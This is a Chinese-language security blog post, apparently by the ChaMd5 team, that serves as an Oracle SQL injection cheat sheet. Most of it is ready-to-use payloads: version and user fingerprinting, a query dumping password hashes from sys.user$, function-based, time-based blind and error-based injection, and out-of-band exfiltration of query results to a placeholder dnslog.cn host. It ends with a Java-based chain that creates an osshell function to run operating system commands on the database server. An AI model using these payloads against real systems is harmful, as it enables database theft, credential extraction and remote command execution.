Every body早上好鸭!
ChaMd5安全团队最勤劳小编上线啦!
Oracle,是甲骨文公司的一款关系数据库管理系统。
User Process、Server Process、PGA可以看做成Clinet端,上面的实例(Instance)和下面的数据库(Database)及参数文件(parameter file)、密码文件(password file)和归档日志文件(archived logfiles)组成Oracle Server,所以整个示图可以理解成一个C/S架构。
Oracle Server由两个实体组成:
实例(instance)与数据库(database)
https://github.com/ChaMd5Team/Pentest-tools/tree/master/Oracleinject
oracle特性:
Oracle 使用查询语句获取数据时需要跟上表名,没有表的情况下可以使用dual,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录
获取数据库版本:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT version FROM v$instance;
获取操作系统版本:
SELECT banner FROM v$version where banner like 'TNS%';
获取当前数据库用户:
SELECT user FROM dual;
获取当前用户权限:
SELECT * FROM session_privs;
获取所有数据库用户密码:
SELECT name, spare4 FROM sys.user$;
列出DBA账户:
获取DB文件路径:
SELECT name FROM V$DATAFILE;
基于函数的注入
Substr函数
select substr(user, 1, 1) from dual;
Decode函数:
错误返回2
select decode(substr(user, 1, 1), '1', (1/1),2) from dual;
正确返回1
select decode(substr(user, 1, 1), 'S', (1/1),2) from dual;
Instr函数:
错误返回0
select instr((select user from dual),'admin') FROM dual;
正确返回1
select instr((select user from dual),'SYS') FROM dual;
时间盲注:
语句一正确延时10秒左右返回1:
select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('olo', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;
语句二正确延时10s左右返回1:
select decode(substr(user,1,1),'S',dbms_pipe.receive_message('olo',10),0) from dual;
语句三正确延时10s左右返回1:
select 1 from dual where 1=0 or DBMS_PIPE.RECEIVE_MESSAGE('pyy', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;
报错注入:
ctxsys.drithsx.sn()函数:
select ctxsys.drithsx.sn(1, (select user from dual)) from dual;
ctxsys.ctx_report.token_type()函数:
select ctxsys.ctx_report.token_type((select user from dual), '1') from dual;
xmltype()函数:
select xmltype('<:'||(select user from dual)||'>') from dual;
dbms_xdb_version.checkin()函数:
select dbms_xdb_version.checkin((select user from dual)) from dual;
dbms_xdb_version.makeversioned()函数:
select dbms_xdb_version.makeversioned((select user from dual)) from dual;
dbms_xdb_version.uncheckout()函数:
select dbms_xdb_version.uncheckout((select user from dual)) from dual;
dbms_utility.sqlid_to_sqlhash()函数:
SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;
ordsys.ord_dicom.getmappingxpath()函数:
select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;
utl_inaddr.get_host_name()函数:
select utl_inaddr.get_host_name((select user from dual)) from dual;
utl_inaddr.get_host_address()函数:
select utl_inaddr.get_host_address('~'||(select user from dual)||'~') from dual;
带外通道(OOB:Out Of Band Channels):
使用一些除常规通道以外的替代的信道来请求服务器资源,一般使用 Oracle 发送HTTP或者DNS请求,将查询结果带到请求中,然后监测外网服务器的HTTP和DNS日志,从日志中获取 sql 语句查询的结果,通过这种方式将繁琐的盲注转换成可以直接简便的获取查询结果的方式,尤其是基于时间的盲注,能极大地加快速度
utl_http.request()函数:
SELECT UTL_HTTP.REQUEST((select user from dual)||'.xxxxx.dnslog.cn') FROM DUAL;
utl_inaddr.get_host_address()函数:(重新打马赛克)
select utl_inaddr.get_host_address((select user from dual)||'.xxxxxx.dnslog.cn') from dual;
sys.dbms_ldap.init()函数:
select dbms_ldap.init('xxxxxx.dnslog.cn',80) from dual;
httpuritype()函数:
select httpuritype((select user from dual)||'.xxxxxx.dnslog.cn').getclob() from dual;
执行系统命令:
select null,null from dual union select 1,dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function osshell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
执行系统命令:
select osshell('whoami') from dual;
鸣谢:
https://xz.aliyun.com/t/7897
end
ChaMd5 ctf组 长期招新
尤其是crypto+reverse+pwn+合约的大佬
欢迎联系admin@chamd5.org